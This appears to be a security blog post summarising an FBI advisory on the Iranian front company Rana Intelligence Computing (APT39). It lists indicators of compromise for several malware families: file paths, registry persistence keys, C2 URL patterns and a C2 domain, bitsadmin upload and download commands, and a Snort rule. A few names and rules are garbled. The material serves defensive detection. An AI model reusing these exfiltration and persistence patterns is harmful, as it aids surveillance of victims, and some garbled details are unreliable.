FBI releases Rana Intelligence Computing indicators of compromise (IOCs)

Introduction

The FBI’s Cyber Division recently disclosed that Iran’s intelligence agency is employing nation-state actors and a front company, Rana Intelligence Computing, to disseminate a years-long malware campaign. The FBI identified these actors as Advanced Persistent Threat 39 (APT 39), Chafer, Remexi, Cadelspy or ITG07. The release provided indicators of compromise (IOCs).

In this post, we’ll unpack the FBI Internet Crime Complaint Center (IC3) Flash release, documenting interesting findings regarding IOCs and IOC security.

What is Rana Intelligence Computing Company?

The Rana Intelligence Computing Company (Rana Corp.) is a Ministry of Intelligence and Security (MOIS) front company in Tehran, Iran. The entity, known by other names as listed above, conducts malicious cyber activity, including malware. 

Who is Rana Corp. targeting?

According to the FBI Flash alert, the group is targeting globally as well as internal to Iran. Targets include hundreds of entities and individuals across 30 countries in Asia, Africa, Europe and North America. In the US, they have attempted to infect 15 companies, mostly in the travel industry, tracking the movements of individuals MOIS deems as a threat. 

Another major target was telecom companies, which are attractive to those seeking to carry out surveillance. That set includes ISPs (internet service providers), which are not infallible. Nation-state actors can use these ISPs to steal and monitor data. 

Within Iran, Rana used malicious intrusion tools to target and monitor Iranian citizens and dissidents, as the bequest of MOIS. Such individuals are journalists, former government employees, environmentalists, refugees, university students, university faculty and employees at international non-government organizations. Additionally, Rana targeted private sector companies in Iran. 

What was Rana’s goal?

Based on intelligence and information about targets, Rana’s objectives seem to be multi-pronged. They sought to monitor those that were a threat as well as harass, repress and exploit. In the case of tracking people, MOIS operatives often located the individual and put them under arrest, where they underwent physical and psychological abuse. 

What is the impact of Rana’s malware activities?

The FBI estimates these malware attacks cost “millions of dollars” to companies in the US and abroad. The FBI did not provide exact numbers. In response to the malware campaigns, the US Department of the Treasury’s Office of Foreign Assets Control (OFAC) imposed sanctions on the malicious actors under the names of APT 39, Cadelspy, Chafer, ITG07, Remexi and 45 other individuals tied to MOIS.

Why did the FBI make the malicious code public?

The FBI advised affected businesses if they were a target, so why make the code public? Their motivator was to cripple MOIS. The advisory stated: 

“Until now, most of these technical indicators have never been publicly discussed, nor attributed to the MOIS by the U.S. government. It is anticipated that by making this malicious code public, it will deal a significant blow to the MOIS and mitigate the ongoing victimization of thousands of individuals and organizations around the world, while also imposing risk and consequences on our cyber adversaries.”

What are the IOCs associated with Ranta?

The FBI provided specific IOCs associated with Ranta so that organizations can evaluate if they were a target. They also uploaded samples of the malware to Virus Control for individual analysis. 

Visual Basic Script (VBS) malware

Rana used several VBS scripts embedded in Microsoft Office documents. Rana operatives then sent these documents to targets using spearphishing or social engineering tactics. If the victim opened the document, it converted into two scripts that took actions to upload and download victim data and proliferate more malware.

VBS IOCs

The FBI provided these signatures to detect the VBS malware presence:

• Files located in the following paths:
  • %userprofile%\appdata\local\Microsoft\Feed\dn
  • %userprofile%\appdata\local\Microsoft\Feed\up
• Text files starting with a letter name followed by numbers (for example, K1234.vbs) that had actor infrastructure embedded.
• Unusual scheduled tasks that run every two minutes and run the .vbs script. The following scheduled task names: UpdatMachine and UpdateMachineG.
• The VBS malware traffic samples included:
  • Request: TCP and dport 80 and contains /update.php?req=
  • Response: TCP and sport 80 and begins with GET /update.php?req=(.*)&m=[bdu]
  • HTTP/1.1
  • Request: TCP and dport 80 and contains update.php?req=.*&m=d
  • Response: MZ.*

See the IC3 advisory for the YARA rule for detection. 

Autolt malware

Rana also used Autolt malware scripts. The delivery of this malware was also via Microsoft Office Documents or malicious links sent via phishing techniques. It worked much the same as the VBS malware. It created two new directories and PowerShell commands to run specific files.

Autolt IOCs

The FBI offered the following signatures to detect the Autolt malware’s presence:

• Files located in the following path:
  • %userprofile%\appdata\local\Microsoft\Feed\dn
  • %userprofile%\appdata\local\Microsoft\Feed\up
  • %userprofile%\appdata\local\Microsoft\Feed\te
• Modifications to registry key:
  • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion
• C2 traffic of the format:
  • http://<server>/update.php?req=<victim identifier>&m=b
  • http://<server>/update.php?req=<victim identifier>&m=d
  • http://<server>/update.php?req=<victim identifier>&m=u
  • http://<server>/update.php?req=<victim identifier>&m=d&b3=1
  • http://<server>/update.php?req=<victim identifier>&m=b&b3=1
  • http://<server>/update.php?req=<victim identifier>&m=u&b3=1

See the IC3 advisory for the YARA rules for detection. 

BITS 1.0 malware

The BITS 1.0 malware seems to have worked with the VBS and Autolt malware. The VBS and/or the Autolt pulled down the BITS 1.0 malware from an actor-controlled infrastructure to cause more damage. 

BITS 1.0 malware IOCs

The FBI presented the below signatures to detect the BITS 1.0 malware’s presence:

• DNS resolution to obscure IP addresses, specifically 65.65.65.X, 76.76.76.76 and 61.61.X.X.
• Snort rule that alerts on TCP packets to and from any IP/any port to any IP/port on port 80 that contains BITS: alert tcp any -> any (sid: 1002351; rev:1; msg.”BITScontent”; content: “BITS”).
• BITS 1.0 malware traffic samples:
  • Requests TCP and dport80 and contains the string asp.asp\?ui=
  • Requests TCP and sport 80 and stream is NOK

See the IC3 advisory for the YARA rules for detection.

BITS 2.0 malware

A variant of the BITS 1.0 malware also exists. This malware employed similar communication channels as BITS 1.0 but different technical details. 

BITS 2.0 malware IOCs

The FBI derived these signatures to detect the BITS 2.0 malware’s presence:

• Egresses data to the following: <url>/test.asp?name=<opname_from_config>_<computer_name>_<mac_address>_<filename>.bak.zak&q=<zipfile data>
• Traffic used: bitsadmin.exe 5
• Does a GET request to: <url>/checkupdate.asp?uname=<username>&pid=<opname>
• Modifies registry key:
  • Software\Microsoft\Internet Explorer\Main
    • Subkey: DisableFirstRunCustomize set to 1
• Creates a folder: C:\Users\<username>\AppData\Local\Microsoft\Events in which Events.vbs resides.
• BITS communications:
  • exe /TRANSFER SecurityCenterUpdate /DOWNLOAD /PRIORITY normal <url><local filepath>
  • exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal <url><local filepath>
  • URL: <url>/<opname>_<computer name>_<mac address>_<filename>
• BITS 2.0 malware traffic samples included:
  • Request: TCP and dport 80 and contains /test.asp
  • Response: TCP and sport 80 and stream begins with name=.*\.*bak\.zak&q=
  • Response: TCP and stream contains Rar!.*\.bak\.zak\x0A

See the IC3 advisory for the YARA rules for detection.

Firefox malware

The FBI also identified malware imitating as legitimate Mozilla Firefox. The malware, 1.exe, contained various files and functions, including CrachReport.exe, Logging.dll, MozillaFirefox.exe., MozillaUpdate.exe and SafeBrowser.exe.

Firefox malware IOCs

To detect the Mozilla Firefox malware’s presence, the FBI provided these signatures:

• Two files created in C:\Users\user\AppData\Local\MozillaFirefox\Config
  • txt: Contains formatted date string
  • txt: Contains randomly generated numerical string
• C:\Users\user\AppData\Local\MozillaFirefox\Cache (contains screenshot data)
• C:\Users\user\AppData\Local\MozillaFirefox\Extensions (contains keylogs)
• FTP traffic that matches the following: u_ex<number>-<numerical string>-<year>_<month>_<day>_<hour>_<minute>_<second>.gzn

See the IC3 advisory for the YARA rules for detection.

Python-based malware

Rana delivered malware via Python, with a .rar file containing a script named ma.py. When it ran, the file conducted an HTTP GET request to a command-and-control server conforming to [Actor IP]/service.html. 

This GET request then downloaded additional malicious files to the victim machine. It was able to retrieve HTTP GET requests, obtain device data, compress and AES encrypt the collected data and then send it to the malicious C2 server. It was also able to record audio and take photos by compromising the microphone and camera. 

Python-based malware IOCs

• The malware traffic signature for this set is TCP and dport=80 and stream starts with err0701. 

See the IC3 advisory for the YARA rules for detection.

Android malware

Rana used an Android malware named optimizer.apk. This Android Package (APK) implant was a variant of Android malware. The coded malware communicated with a C2 server, saveingone.com, which previously resolved to an Iranian IP address. The APK was able to steal information and remotely access the Android devices. 

Android malware IOCs

Take the following steps to detect if the Optimizer implant application was running on a device: 

• Settings -> Apps -> Running. 
  • The implant sent a Domain Name Service (DNS) request to resolve the C2 domain, saveingone.com. 
  • HTTP GET requests formed to retrieve an unknown type of data from the malicious C2. 
  • The implant used HTTP POST requests to send AES-encrypted zipped data to the C2. The POST requests coded into a loop and continuously collected the device data.

See the IC3 advisory for the YARA rules for detection.

Depot.dat malware

Depot.dat can collect victim screenshots, keylogger information and other data. It can then send it to the Rana-controlled infrastructure. The malware had two components: a dropper and an encrypted Microsoft CAB file named depot.dat. It contains four files (Bootmgr.dll, bootui.dll, mlp.dat and tfd.log) that make up a second malware stage. The dropper decrypts and encrypts the CAB file to establish persistence. The dropper did so through a password execution at runtime. 

Depot.dat IOCs

The following signatures are useful for detecting the Depot.dat malware’s presence:

• Known filenames:
  • Dropper: installer.exe, svchost.exe
  • depot.dat
• Both observed sample contents begin with 2300, but the dropper code would support files starting with 2640 or MSCF with an approximate size of 59k.
• Second stage directory paths:
  • C:\Windows\system32\Bootui.dll
  • C:\Windows\system32\Bootmgr.dl
  • C:\Windows\system32\Tfd.log
  • C:\Windows\system32\Mlp.dat
• Director paths for victim data:
  • C:\Windows\Help\OEM
  • C:\Windows\debug\WIA
• Victim data:
  • Stored in one of the above paths, named <timestamp>.tmp and begins with 2300.
• Altered registry keys:
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, specifically LoadAppInit_DLLs to include Bootmgr.dll and RequireSigned to be off.

See the IC3 advisory for the YARA rules for detection.

IOC security takeaways

While this release certainly illustrates Iran’s spying and monitoring network, it’s not the first time, nor will it be the last. The threat is ongoing and any organization should practice IOC security best practices. 

Protections for ISP hacking

ISPs are hackable, as shown in this example. Securing your data and communication channels is imperative. There are many touchpoints that may be weak as data travels across the internet. The best way to protect against this is to employ encryption. 

Public key infrastructure (PKI) is a feasible way to protect data even in a compromised ISP. An IOC security best practice would be to use the HTTPS protocol and S/MIME certificates for end-to-end encryption. 

TLS certificates ensure that all connections occur under HTTPS, preventing eavesdropping and MitM attacks to access plaintext information. 

S/MIME are email signing certificates that digitally sign and encrypt the communications. In this situation, even if someone intercepted the messages, they would need your organization’s individual private keys to decrypt and read them. 

Other network security best practices

• Update applications when new versions are available always, regardless of how small it is or if the vendor doesn’t require it.
• Establish an offline backup of servers that are “known good” with a file integrity system.
• Adopt user input validation to restrict local and remote file inclusion vulnerabilities.
• Configure webserver security, disabling or blocking all unnecessary services.
• Leverage a reverse proxy or alternative service to restrict accessible URL paths to known legitimate ones. 
• Conduct vulnerability scans regularly.
• Deploy firewalls.
• Perform regular virus checks, application fuzzing, code reviews and server network analysis. 

Stay current on IOCs

It’s a good idea to always stay up to date on IOCs, whether distributed by the FBI’s Cyber Division or other government entities. You can subscribe to FBI email updates here. These updates keep you aware of known IOCs, so you can then assure there’s been no compromise to your network. 

 

Sources

Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07, FBI Flash

Treasury Sanctions Cyber Actors Backed by Iranian Intelligence Ministry, US Department of the Treasury